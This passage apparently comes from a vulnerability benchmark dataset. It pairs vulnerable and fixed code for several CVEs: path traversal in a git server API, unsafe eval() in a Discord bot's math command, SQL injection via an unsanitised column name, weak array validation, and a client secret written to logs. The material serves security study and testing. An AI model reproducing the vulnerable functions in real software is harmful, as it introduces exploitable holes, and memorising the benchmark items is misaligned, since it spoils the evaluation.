treePath)\n\t\t\treturn\n\t\t}\n\n\t\tc.JSONSuccess(content)\n\t\treturn\n\t}\n\n\t// The entry is a directory\n\tdir, err := gitRepo.LsTree(entry.ID().String())\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"get tree\")\n\t\treturn\n\t}\n\n\tentries, err := dir.Entries()\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"list entries\")\n\t\treturn\n\t}\n\n\tif len(entries) == 0 {\n\t\tc.JSONSuccess([]string{})\n\t\treturn\n\t}\n\n\tcontents := make([]*repoContent, 0, len(entries))\n\tfor _, entry := range entries {\n\t\tsubpath := path.Join(treePath, entry.Name())\n\t\tcontent, err := toRepoContent(c, ref, subpath, commit, entry)\n\t\tif err != nil {\n\t\t\tc.Errorf(err, \"convert %q to repoContent\", subpath)\n\t\t\treturn\n\t\t}\n\n\t\tcontents = append(contents, content)\n\t}\n\tc.JSONSuccess(contents)\n}"}, {"id": "vul_go_93_2", "commit": "8a3b819", "file_path": "internal/route/api/v1/repo/contents.go", "start_line": "181", "end_line": "246", "snippet": "func PutContents(c *context.APIContext, r PutContentsRequest) {\n\tcontent, err := base64.StdEncoding.DecodeString(r.Content)\n\tif err != nil {\n\t\tc.Error(err, \"decoding base64\")\n\t\treturn\n\t}\n\n\tif r.Branch == \"\" {\n\t\tr.Branch = c.Repo.Repository.DefaultBranch\n\t}\n\ttreePath := c.Params(\"*\")\n\terr = c.Repo.Repository.UpdateRepoFile(\n\t\tc.User,\n\t\tdatabase.UpdateRepoFileOptions{\n\t\t\tOldBranch: c.Repo.Repository.DefaultBranch,\n\t\t\tNewBranch: r.Branch,\n\t\t\tOldTreeName: treePath,\n\t\t\tNewTreeName: treePath,\n\t\t\tMessage: r.Message,\n\t\t\tContent: string(content),\n\t\t},\n\t)\n\tif err != nil {\n\t\tc.Error(err, \"updating 
repository file\")\n\t\treturn\n\t}\n\n\trepoPath := repoutil.RepositoryPath(c.Params(\":username\"), c.Params(\":reponame\"))\n\tgitRepo, err := git.Open(repoPath)\n\tif err != nil {\n\t\tc.Error(err, \"open repository\")\n\t\treturn\n\t}\n\n\tcommit, err := gitRepo.CatFileCommit(r.Branch)\n\tif err != nil {\n\t\tc.Error(err, \"get file commit\")\n\t\treturn\n\t}\n\n\tentry, err := commit.TreeEntry(treePath)\n\tif err != nil {\n\t\tc.Error(err, \"get tree entry\")\n\t\treturn\n\t}\n\n\tapiContent, err := toRepoContent(c, r.Branch, treePath, commit, entry)\n\tif err != nil {\n\t\tc.Error(err, \"convert to *repoContent\")\n\t\treturn\n\t}\n\n\tapiCommit, err := gitCommitToAPICommit(commit, c)\n\tif err != nil {\n\t\tc.Error(err, \"convert to *api.Commit\")\n\t\treturn\n\t}\n\n\tc.JSON(\n\t\thttp.StatusCreated,\n\t\tmap[string]any{\n\t\t\t\"content\": apiContent,\n\t\t\t\"commit\": apiCommit,\n\t\t},\n\t)\n}"}], "fix_func": [{"id": "fix_go_93_1", "commit": "9a9388a", "file_path": "internal/route/api/v1/repo/contents.go", "start_line": "105", "end_line": "173", "snippet": "func GetContents(c *context.APIContext) {\n\trepoPath := repoutil.RepositoryPath(c.Params(\":username\"), c.Params(\":reponame\"))\n\tgitRepo, err := git.Open(repoPath)\n\tif err != nil {\n\t\tc.Error(err, \"open repository\")\n\t\treturn\n\t}\n\n\tref := c.Query(\"ref\")\n\tif ref == \"\" {\n\t\tref = c.Repo.Repository.DefaultBranch\n\t}\n\n\tcommit, err := gitRepo.CatFileCommit(ref)\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"get commit\")\n\t\treturn\n\t}\n\n\t// \\ud83d\\udea8 SECURITY: Prevent path traversal.\n\ttreePath := pathutil.Clean(c.Params(\"*\"))\n\tentry, err := commit.TreeEntry(treePath)\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"get tree entry\")\n\t\treturn\n\t}\n\n\tif !entry.IsTree() {\n\t\tcontent, err := toRepoContent(c, ref, treePath, commit, entry)\n\t\tif err != nil {\n\t\t\tc.Errorf(err, \"convert %q to repoContent\", treePath)\n\t\t\treturn\n\t\t}\n\n\t\tc.JSONSuccess(content)\n\t\treturn\n\t}\n\n\t// The entry is a directory\n\tdir, err := gitRepo.LsTree(entry.ID().String())\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"get tree\")\n\t\treturn\n\t}\n\n\tentries, err := dir.Entries()\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"list entries\")\n\t\treturn\n\t}\n\n\tif len(entries) == 0 {\n\t\tc.JSONSuccess([]string{})\n\t\treturn\n\t}\n\n\tcontents := make([]*repoContent, 0, len(entries))\n\tfor _, entry := range entries {\n\t\tsubpath := path.Join(treePath, entry.Name())\n\t\tcontent, err := toRepoContent(c, ref, subpath, commit, entry)\n\t\tif err != nil {\n\t\t\tc.Errorf(err, \"convert %q to repoContent\", subpath)\n\t\t\treturn\n\t\t}\n\n\t\tcontents = append(contents, content)\n\t}\n\tc.JSONSuccess(contents)\n}"}, {"id": "fix_go_93_2", "commit": "9a9388a", "file_path": "internal/route/api/v1/repo/contents.go", "start_line": "183", "end_line": "251", "snippet": "func PutContents(c *context.APIContext, r PutContentsRequest) {\n\tcontent, err := base64.StdEncoding.DecodeString(r.Content)\n\tif err != nil {\n\t\tc.Error(err, \"decoding base64\")\n\t\treturn\n\t}\n\n\tif r.Branch == \"\" {\n\t\tr.Branch = c.Repo.Repository.DefaultBranch\n\t}\n\n\t// \\ud83d\\udea8 SECURITY: Prevent path traversal.\n\ttreePath := pathutil.Clean(c.Params(\"*\"))\n\n\terr = c.Repo.Repository.UpdateRepoFile(\n\t\tc.User,\n\t\tdatabase.UpdateRepoFileOptions{\n\t\t\tOldBranch: c.Repo.Repository.DefaultBranch,\n\t\t\tNewBranch: 
r.Branch,\n\t\t\tOldTreeName: treePath,\n\t\t\tNewTreeName: treePath,\n\t\t\tMessage: r.Message,\n\t\t\tContent: string(content),\n\t\t},\n\t)\n\tif err != nil {\n\t\tc.Error(err, \"updating repository file\")\n\t\treturn\n\t}\n\n\trepoPath := repoutil.RepositoryPath(c.Params(\":username\"), c.Params(\":reponame\"))\n\tgitRepo, err := git.Open(repoPath)\n\tif err != nil {\n\t\tc.Error(err, \"open repository\")\n\t\treturn\n\t}\n\n\tcommit, err := gitRepo.CatFileCommit(r.Branch)\n\tif err != nil {\n\t\tc.Error(err, \"get file commit\")\n\t\treturn\n\t}\n\n\tentry, err := commit.TreeEntry(treePath)\n\tif err != nil {\n\t\tc.Error(err, \"get tree entry\")\n\t\treturn\n\t}\n\n\tapiContent, err := toRepoContent(c, r.Branch, treePath, commit, entry)\n\tif err != nil {\n\t\tc.Error(err, \"convert to *repoContent\")\n\t\treturn\n\t}\n\n\tapiCommit, err := gitCommitToAPICommit(commit, c)\n\tif err != nil {\n\t\tc.Error(err, \"convert to *api.Commit\")\n\t\treturn\n\t}\n\n\tc.JSON(\n\t\thttp.StatusCreated,\n\t\tmap[string]any{\n\t\t\t\"content\": apiContent,\n\t\t\t\"commit\": apiCommit,\n\t\t},\n\t)\n}"}], "vul_patch": "--- a/internal/route/api/v1/repo/contents.go\n+++ b/internal/route/api/v1/repo/contents.go\n@@ -17,7 +17,8 @@\n \t\treturn\n \t}\n \n-\ttreePath := c.Params(\"*\")\n+\t// \\ud83d\\udea8 SECURITY: Prevent path traversal.\n+\ttreePath := pathutil.Clean(c.Params(\"*\"))\n \tentry, err := commit.TreeEntry(treePath)\n \tif err != nil {\n \t\tc.NotFoundOrError(gitutil.NewError(err), \"get tree entry\")\n\n--- a/internal/route/api/v1/repo/contents.go\n+++ b/internal/route/api/v1/repo/contents.go\n@@ -8,7 +8,10 @@\n \tif r.Branch == \"\" {\n \t\tr.Branch = c.Repo.Repository.DefaultBranch\n \t}\n-\ttreePath := c.Params(\"*\")\n+\n+\t// \\ud83d\\udea8 SECURITY: Prevent path traversal.\n+\ttreePath := pathutil.Clean(c.Params(\"*\"))\n+\n \terr = c.Repo.Repository.UpdateRepoFile(\n \t\tc.User,\n \t\tdatabase.UpdateRepoFileOptions{\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-17479", "cve_description": "jpv (aka Json Pattern Validator) before 2.2.2 does not properly validate input, as demonstrated by a corrupted array.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/manvel-khnkoyan/jpv", "patch_url": ["https://github.com/manvel-khnkoyan/jpv/commit/e3eec1215caa8d5c560f5e88d0943422831927d6"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_71_1", "commit": "8a3cb77", "file_path": "index.js", "start_line": 116, "end_line": 285, "snippet": "const compare = (value, pattern, options) => {\n /*\n * Special for debugging\n * */\n const res = (result) => {\n let val = '';\n if (!pattern || ((typeof pattern !== 'object') && (typeof pattern !== 'string') && typeof pattern !== 'function')) {\n val = String(pattern)\n } else if (pattern.constructor === JpvObject) {\n val = `operator \"${pattern.type}\": ${JSON.stringify(pattern.value)}`;\n } else {\n JSON.stringify(pattern)\n }\n\n\n if (typeof pattern === 'function') {\n val = pattern.toString();\n }\n if (!result && options && options.debug) {\n options.logger(`error - the value of: {${options.deepLog.join('.')}: ` +\n `${String(value)}} not matched with: ${val}`);\n }\n return result;\n };\n\n // simple types pattern = number | boolean | symbol | bigint\n if ((typeof 
pattern === 'number') || (typeof pattern === 'symbol') || (typeof pattern === 'boolean') ||\n (typeof pattern === 'bigint') || (typeof pattern === 'undefined') || (pattern === null)) {\n return res(pattern === value);\n }\n\n /*\n * When pattern is regex\n */\n if (pattern instanceof RegExp) {\n return res(String(value).match(pattern));\n }\n\n // String\n if ((typeof pattern === 'string')) {\n // Native Types\n let nativeMatches = pattern.match(/^(!)?\\((.*)\\)(\\?)?$/i);\n if (nativeMatches !== null) {\n // eslint-disable-next-line valid-typeof\n let match = (typeof value === nativeMatches[2]);\n\n // ------------------------> Deprecated\n // Negation ? Operator\n if (typeof nativeMatches[3] !== 'undefined') {\n depricated('neg');\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n if (nativeMatches[1] === '!') {\n depricated('neg');\n return res(!match);\n }\n // <-------------------------\n\n return res(match);\n }\n\n // Patterns\n let logicalMatches = pattern.match(/^(!)?\\[(.*)\\](\\?)?$/i);\n if (logicalMatches !== null) {\n const valid = comparePattern(value, logicalMatches[2]);\n\n // ------------------------> Deprecated\n // ? Operator\n if (typeof logicalMatches[3] !== 'undefined') {\n depricated('neg');\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n // ! Operator\n if (typeof logicalMatches[1] !== 'undefined') {\n depricated('neg');\n return res(!valid);\n }\n // <-------------------------\n\n return res(valid);\n }\n\n // ------------------------> Deprecated\n // Functional Regex\n let functionalRegexMatches = pattern.match(/^(?!=^|,)(!)?\\{\\/(.*)\\/([a-z]*)\\}(\\?)?$/i);\n if (functionalRegexMatches !== null) {\n depricated('tag');\n let match = (String(value).match(new RegExp(functionalRegexMatches[2], functionalRegexMatches[3])) !== null);\n // Negation ? Operator\n if (typeof functionalRegexMatches[4] !== 'undefined') {\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n return res(functionalRegexMatches[1] === '!' ? !match : match);\n }\n\n // Functional Fixed\n let functionalFixedMatches = pattern.match(/^(!)?\\{(.*)\\}(\\?)?$/i);\n if (functionalFixedMatches !== null) {\n depricated('tag');\n let match = (String(value) === String(functionalFixedMatches[2]));\n // Negation ? Operator\n if (typeof functionalFixedMatches[3] !== 'undefined') {\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n return res(functionalFixedMatches[1] === '!' ? 
!match : match);\n }\n // <-------------------------\n\n // Fixed String Comparition\n return res(value === pattern);\n }\n\n // Constructor is JpvObject\n if (typeof pattern === 'object' && pattern.constructor === JpvObject) {\n if (pattern.type === 'not') {\n return res(!compare(value, pattern.value, options));\n }\n if (pattern.type === 'and') {\n for (let i = 0; i < pattern.value.length; i++) {\n if (!compare(value, pattern.value[i])) {\n return res(false);\n }\n }\n return true;\n }\n if (pattern.type === 'or') {\n for (let i = 0; i < pattern.value.length; i++) {\n if (compare(value, pattern.value[i])) {\n return true;\n }\n }\n return res(false);\n }\n if (pattern.type === 'exact') {\n return res(value === pattern.value);\n }\n\n if (pattern.type === 'typeOf') {\n // eslint-disable-next-line valid-typeof\n return res(typeof value === pattern.value);\n }\n\n if (pattern.type === 'is') {\n return res(comparePattern(value, pattern.value));\n }\n }\n\n // pattern = object\n if (typeof pattern === 'object') {\n if (value !== null) {\n return res(value.constructor === pattern.constructor);\n }\n return res(value === pattern);\n }\n\n // pattern is a function\n if (typeof pattern === 'function') {\n return res(!!pattern(value));\n }\n\n throw new Error('invalid data type');\n};"}], "fix_func": [{"id": "fix_js_71_1", "commit": "e3eec1215caa8d5c560f5e88d0943422831927d6", "file_path": "index.js", "start_line": 137, "end_line": 309, "snippet": "const compare = (value, pattern, options) => {\n /*\n * Special for debugging\n * */\n const res = (result) => {\n let val = '';\n if (!pattern || ((typeof pattern !== 'object') && (typeof pattern !== 'string') && typeof pattern !== 'function')) {\n val = String(pattern);\n } else if (pattern.constructor === JpvObject) {\n val = `operator \"${pattern.type}\": ${JSON.stringify(pattern.value)}`;\n } else {\n JSON.stringify(pattern);\n }\n\n if (typeof pattern === 'function') {\n val = pattern.toString();\n }\n if (!result && options && options.debug) {\n options.logger(`error - the value of: {${options.deepLog.join('.')}: ` +\n `${String(value)}} not matched with: ${val}`);\n }\n return result;\n };\n\n // simple types pattern = number | boolean | symbol | bigint\n if ((typeof pattern === 'number') || (typeof pattern === 'symbol') || (typeof pattern === 'boolean') ||\n (typeof pattern === 'bigint') || (typeof pattern === 'undefined') || (pattern === null)) {\n return res(pattern === value);\n }\n\n /*\n * When pattern is regex\n */\n if (pattern instanceof RegExp) {\n return res(String(value).match(pattern));\n }\n\n // String\n if ((typeof pattern === 'string')) {\n // Native Types\n let nativeMatches = pattern.match(/^(!)?\\((.*)\\)(\\?)?$/i);\n if (nativeMatches !== null) {\n // eslint-disable-next-line valid-typeof\n let match = (typeof value === nativeMatches[2]);\n\n // ------------------------> Deprecated\n // Negation ? Operator\n if (typeof nativeMatches[3] !== 'undefined') {\n depricated('neg');\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n if (nativeMatches[1] === '!') {\n depricated('neg');\n return res(!match);\n }\n // <-------------------------\n\n return res(match);\n }\n\n // Patterns\n let logicalMatches = pattern.match(/^(!)?\\[(.*)\\](\\?)?$/i);\n if (logicalMatches !== null) {\n const valid = comparePattern(value, logicalMatches[2]);\n\n // ------------------------> Deprecated\n // ? 
Operator\n if (typeof logicalMatches[3] !== 'undefined') {\n depricated('neg');\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n // ! Operator\n if (typeof logicalMatches[1] !== 'undefined') {\n depricated('neg');\n return res(!valid);\n }\n // <-------------------------\n\n return res(valid);\n }\n\n // ------------------------> Deprecated\n // Functional Regex\n let functionalRegexMatches = pattern.match(/^(?!=^|,)(!)?\\{\\/(.*)\\/([a-z]*)\\}(\\?)?$/i);\n if (functionalRegexMatches !== null) {\n depricated('tag');\n let match = (String(value).match(new RegExp(functionalRegexMatches[2], functionalRegexMatches[3])) !== null);\n // Negation ? Operator\n if (typeof functionalRegexMatches[4] !== 'undefined') {\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n return res(functionalRegexMatches[1] === '!' ? !match : match);\n }\n\n // Functional Fixed\n let functionalFixedMatches = pattern.match(/^(!)?\\{(.*)\\}(\\?)?$/i);\n if (functionalFixedMatches !== null) {\n depricated('tag');\n let match = (String(value) === String(functionalFixedMatches[2]));\n // Negation ? Operator\n if (typeof functionalFixedMatches[3] !== 'undefined') {\n if (value === null || typeof value === 'undefined' || value === '') {\n return true;\n }\n }\n return res(functionalFixedMatches[1] === '!' ? !match : match);\n }\n // <-------------------------\n\n // Fixed String Comparition\n return res(value === pattern);\n }\n\n // Constructor is JpvObject\n if (typeof pattern === 'object' && pattern.constructor === JpvObject) {\n if (pattern.type === 'not') {\n return res(!compare(value, pattern.value, options));\n }\n if (pattern.type === 'and') {\n for (let i = 0; i < pattern.value.length; i++) {\n if (!compare(value, pattern.value[i])) {\n return res(false);\n }\n }\n return true;\n }\n if (pattern.type === 'or') {\n for (let i = 0; i < pattern.value.length; i++) {\n if (compare(value, pattern.value[i])) {\n return true;\n }\n }\n return res(false);\n }\n if (pattern.type === 'exact') {\n return res(value === pattern.value);\n }\n\n if (pattern.type === 'typeOf') {\n // eslint-disable-next-line valid-typeof\n return res(typeof value === pattern.value);\n }\n\n if (pattern.type === 'is') {\n return res(comparePattern(value, pattern.value));\n }\n }\n\n // pattern = object\n if (typeof pattern === 'object') {\n if (isArray(pattern)) {\n return res(isArray(value));\n }\n\n if (value !== null) {\n return res(value.constructor === pattern.constructor);\n }\n return res(value === pattern);\n }\n\n // pattern is a function\n if (typeof pattern === 'function') {\n return res(!!pattern(value));\n }\n\n throw new Error('invalid data type');\n};"}, {"id": "fix_js_71_2", "commit": "e3eec1215caa8d5c560f5e88d0943422831927d6", "file_path": "index.js", "start_line": 45, "end_line": 65, "snippet": "/**\n * Custom Is Array\n * @param value\n * @returns boolean\n */\nfunction isArray (value) {\n if (Object.prototype.hasOwnProperty.call(Array, 'isArray')) {\n return Array.isArray(value);\n }\n if (typeof value !== 'object') {\n return false;\n }\n if (Object.prototype.toString.call(value) !== '[object Array]') {\n return false;\n }\n if (!(value instanceof Array)) {\n return false;\n }\n return true;\n}\n"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -5,20 +5,19 @@\n const res = (result) => {\n let val = '';\n if (!pattern || ((typeof pattern !== 'object') && (typeof pattern !== 'string') && typeof pattern !== 'function')) {\n- val = 
String(pattern)\n+ val = String(pattern);\n } else if (pattern.constructor === JpvObject) {\n val = `operator \"${pattern.type}\": ${JSON.stringify(pattern.value)}`;\n } else {\n- JSON.stringify(pattern)\n+ JSON.stringify(pattern);\n }\n-\n \n if (typeof pattern === 'function') {\n val = pattern.toString();\n }\n if (!result && options && options.debug) {\n options.logger(`error - the value of: {${options.deepLog.join('.')}: ` +\n- `${String(value)}} not matched with: ${val}`);\n+ `${String(value)}} not matched with: ${val}`);\n }\n return result;\n };\n@@ -155,6 +154,10 @@\n \n // pattern = object\n if (typeof pattern === 'object') {\n+ if (isArray(pattern)) {\n+ return res(isArray(value));\n+ }\n+\n if (value !== null) {\n return res(value.constructor === pattern.constructor);\n }\n\n--- /dev/null\n+++ b/index.js\n@@ -0,0 +1,20 @@\n+/**\n+ * Custom Is Array\n+ * @param value\n+ * @returns boolean\n+ */\n+function isArray (value) {\n+ if (Object.prototype.hasOwnProperty.call(Array, 'isArray')) {\n+ return Array.isArray(value);\n+ }\n+ if (typeof value !== 'object') {\n+ return false;\n+ }\n+ if (Object.prototype.toString.call(value) !== '[object Array]') {\n+ return false;\n+ }\n+ if (!(value instanceof Array)) {\n+ return false;\n+ }\n+ return true;\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-17479:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/jpv\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnpx tape test/arrays.js\n", "unit_test_cmd": null} {"cve_id": "CVE-2024-43404", "cve_description": "MEGABOT is a fully customized Discord bot for learning and fun. The `/math` command and functionality of MEGABOT versions < 1.5.0 contains a remote code execution vulnerability due to a Python `eval()`. The vulnerability allows an attacker to inject Python code into the `expression` parameter when using `/math` in any Discord channel. This vulnerability impacts any discord guild utilizing MEGABOT. 
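Editor's note on the CVE-2020-17479 (jpv) record that closes above (the CVE-2024-43404 record continues below): the patch adds a custom `isArray()` guard so that an array can no longer satisfy an object pattern. The sketch below is a hedged Python analogue of that class of bug, not the project's JavaScript; all names are illustrative.

```python
# Hypothetical analogue of the jpv validation bypass: a container-level
# type check that also accepts arrays, and the patched variant that
# tests for the array case explicitly (like the added isArray() guard).

def loose_is_object(value) -> bool:
    # BAD: arrays satisfy the "object" check too, so a crafted
    # array payload passes validation meant for objects.
    return isinstance(value, (dict, list))

def strict_is_object(value) -> bool:
    # FIXED: rule out arrays first, then accept plain objects only.
    if isinstance(value, list):
        return False
    return isinstance(value, dict)

payload = ["unexpected", "array"]
print(loose_is_object(payload))   # True  -> validation bypass
print(strict_is_object(payload))  # False -> rejected
```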
This vulnerability was fixed in release version 1.5.0.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}}, "repo": "https://github.com/NicPWNs/MEGABOT", "patch_url": ["https://github.com/NicPWNs/MEGABOT/commit/71e79e5581ea36313700385b112d863053fb7ed6"], "programing_language": "Python", "vul_func": [{"id": "vul_py_129_1", "commit": "9d2873c", "file_path": "commands/math.py", "start_line": 5, "end_line": 14, "snippet": "async def math(ctx, expression):\n\n try:\n response = str(eval(expression))\n except:\n response = \"Invalid Expression!\"\n\n embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=response)\n\n await ctx.respond(embed=embed)"}], "fix_func": [{"id": "fix_py_129_1", "commit": "71e79e5", "file_path": "commands/math.py", "start_line": 6, "end_line": 35, "snippet": "async def math(ctx, expression):\n\n try:\n tree = ast.parse(expression, mode=\"eval\")\n except SyntaxError:\n result = \"Not a valid Python expression!\"\n embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=result)\n await ctx.respond(embed=embed)\n\n if not all(\n isinstance(\n node,\n (\n ast.Expression,\n ast.UnaryOp,\n ast.unaryop,\n ast.BinOp,\n ast.operator,\n ast.Constant,\n ),\n )\n for node in ast.walk(tree)\n ):\n result = \"Not a valid mathematical expression!\"\n embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=result)\n await ctx.respond(embed=embed)\n else:\n result = eval(compile(tree, filename=\"\", mode=\"eval\"))\n embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=result)\n await ctx.respond(embed=embed)"}], "vul_patch": "--- a/commands/math.py\n+++ b/commands/math.py\n@@ -1,10 +1,30 @@\n async def math(ctx, expression):\n \n try:\n- response = str(eval(expression))\n- except:\n- response = \"Invalid Expression!\"\n+ tree = ast.parse(expression, mode=\"eval\")\n+ except SyntaxError:\n+ result = \"Not a valid Python expression!\"\n+ embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=result)\n+ await ctx.respond(embed=embed)\n \n- embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=response)\n-\n- await ctx.respond(embed=embed)\n+ if not all(\n+ isinstance(\n+ node,\n+ (\n+ ast.Expression,\n+ ast.UnaryOp,\n+ ast.unaryop,\n+ ast.BinOp,\n+ ast.operator,\n+ ast.Constant,\n+ ),\n+ )\n+ for node in ast.walk(tree)\n+ ):\n+ result = \"Not a valid mathematical expression!\"\n+ embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=result)\n+ await ctx.respond(embed=embed)\n+ else:\n+ result = eval(compile(tree, filename=\"\", mode=\"eval\"))\n+ embed = discord.Embed(color=0x5B8F3C, title=\"\\ud83e\\uddee Math\", description=result)\n+ await ctx.respond(embed=embed)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-36631", "cve_description": "A vulnerability was found in barronwaffles dwc_network_server_emulator. It has been declared as critical. This vulnerability affects the function update_profile of the file gamespy/gs_database.py. The manipulation of the argument firstname/lastname leads to sql injection. The attack can be initiated remotely. 
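The CVE-2024-43404 record above is one of the few where the fix is plain Python, so it can be distilled directly: parse the input with `ast`, allow only arithmetic node types, and only then compile and evaluate. A minimal runnable version of that allow-list approach, stripped of the Discord plumbing:

```python
import ast

# Node types the patched /math command accepts (arithmetic only).
ALLOWED = (ast.Expression, ast.UnaryOp, ast.unaryop,
           ast.BinOp, ast.operator, ast.Constant)

def safe_math(expression: str) -> str:
    try:
        tree = ast.parse(expression, mode="eval")
    except SyntaxError:
        return "Not a valid Python expression!"
    if not all(isinstance(node, ALLOWED) for node in ast.walk(tree)):
        return "Not a valid mathematical expression!"
    # Safe to evaluate: the tree can only contain numbers and operators.
    return str(eval(compile(tree, filename="", mode="eval")))

print(safe_math("2 * (3 + 4)"))                    # 14
print(safe_math("__import__('os').system('id')"))  # rejected
```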
The name of the patch is f70eb21394f75019886fbc2fb536de36161ba422. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216772.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/barronwaffles/dwc_network_server_emulator", "patch_url": ["https://github.com/barronwaffles/dwc_network_server_emulator/commit/f70eb21394f75019886fbc2fb536de36161ba422"], "programing_language": "Python", "vul_func": [{"id": "vul_py_144_1", "commit": "78ea738", "file_path": "gamespy/gs_database.py", "start_line": 365, "end_line": 375, "snippet": " def update_profile(self, profileid, field):\n \"\"\"Found profile id associated with session key.\n\n Start replacing each field one by one.\n TODO: Optimize this so it's done all in one update.\n FIXME: Possible security issue due to embedding an unsanitized\n string directly into the statement.\n \"\"\"\n with Transaction(self.conn) as tx:\n q = \"UPDATE users SET \\\"%s\\\" = ? WHERE profileid = ?\"\n tx.nonquery(q % field[0], (field[1], profileid))"}], "fix_func": [{"id": "fix_py_144_1", "commit": "f70eb21", "file_path": "gamespy/gs_database.py", "start_line": 365, "end_line": 375, "snippet": " def update_profile(self, profileid, field):\n \"\"\"Found profile id associated with session key.\n\n Start replacing each field one by one.\n TODO: Optimize this so it's done all in one update.\n TODO: Check if other values than firstname/lastname are set using this\n \"\"\"\n if field[0] in [\"firstname\", \"lastname\"]:\n with Transaction(self.conn) as tx:\n q = \"UPDATE users SET \\\"%s\\\" = ? WHERE profileid = ?\"\n tx.nonquery(q % field[0], (field[1], profileid))"}], "vul_patch": "--- a/gamespy/gs_database.py\n+++ b/gamespy/gs_database.py\n@@ -3,9 +3,9 @@\n \n Start replacing each field one by one.\n TODO: Optimize this so it's done all in one update.\n- FIXME: Possible security issue due to embedding an unsanitized\n- string directly into the statement.\n+ TODO: Check if other values than firstname/lastname are set using this\n \"\"\"\n- with Transaction(self.conn) as tx:\n- q = \"UPDATE users SET \\\"%s\\\" = ? WHERE profileid = ?\"\n- tx.nonquery(q % field[0], (field[1], profileid))\n+ if field[0] in [\"firstname\", \"lastname\"]:\n+ with Transaction(self.conn) as tx:\n+ q = \"UPDATE users SET \\\"%s\\\" = ? WHERE profileid = ?\"\n+ tx.nonquery(q % field[0], (field[1], profileid))\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-48374", "cve_description": "zot is ancontainer image/artifact registry based on the Open Container Initiative Distribution Specification. Prior to version 2.1.3 (corresponding to pseudoversion 1.4.4-0.20250522160828-8a99a3ed231f), when using Keycloak as an oidc provider, the clientsecret gets printed into the container stdout logs for an example at container startup. 
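For the CVE-2020-36631 record above: column names cannot be bound as SQL parameters, which is why the patch falls back to an identifier allow-list while the values still go through placeholders. A minimal sketch of that pattern with `sqlite3` (the table layout here is invented for the demo):

```python
import sqlite3

ALLOWED_FIELDS = {"firstname", "lastname"}  # identifier allow-list

def update_profile(conn, profileid, field):
    name, value = field
    # Identifiers are checked before interpolation; values are bound.
    if name not in ALLOWED_FIELDS:
        raise ValueError(f"refusing to update field {name!r}")
    conn.execute(f'UPDATE users SET "{name}" = ? WHERE profileid = ?',
                 (value, profileid))

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (profileid INTEGER, firstname TEXT, lastname TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'a', 'b')")
update_profile(conn, 1, ("firstname", "Mallory"))                  # ok
try:
    update_profile(conn, 1, ('lastname" = "x", firstname = "y', "z"))
except ValueError as err:
    print(err)                                                     # blocked
```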
Version 2.1.3 (corresponding to pseudoversion 1.4.4-0.20250522160828-8a99a3ed231f) fixes the issue.", "cwe_info": {"CWE-532": {"name": "Insertion of Sensitive Information into Log File", "description": "The product writes sensitive information to a log file."}}, "repo": "https://github.com/project-zot/zot", "patch_url": ["https://github.com/project-zot/zot/commit/8a99a3ed231fdcd8467e986182b4705342b6a15e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_74_1", "commit": "af4a46b", "file_path": "pkg/api/config/config.go", "start_line": "327", "end_line": "359", "snippet": "func (c *Config) Sanitize() *Config {\n\tsanitizedConfig := &Config{}\n\n\tif err := DeepCopy(c, sanitizedConfig); err != nil {\n\t\tpanic(err)\n\t}\n\n\tif c.HTTP.Auth != nil && c.HTTP.Auth.LDAP != nil && c.HTTP.Auth.LDAP.bindPassword != \"\" {\n\t\tsanitizedConfig.HTTP.Auth.LDAP = &LDAPConfig{}\n\n\t\tif err := DeepCopy(c.HTTP.Auth.LDAP, sanitizedConfig.HTTP.Auth.LDAP); err != nil 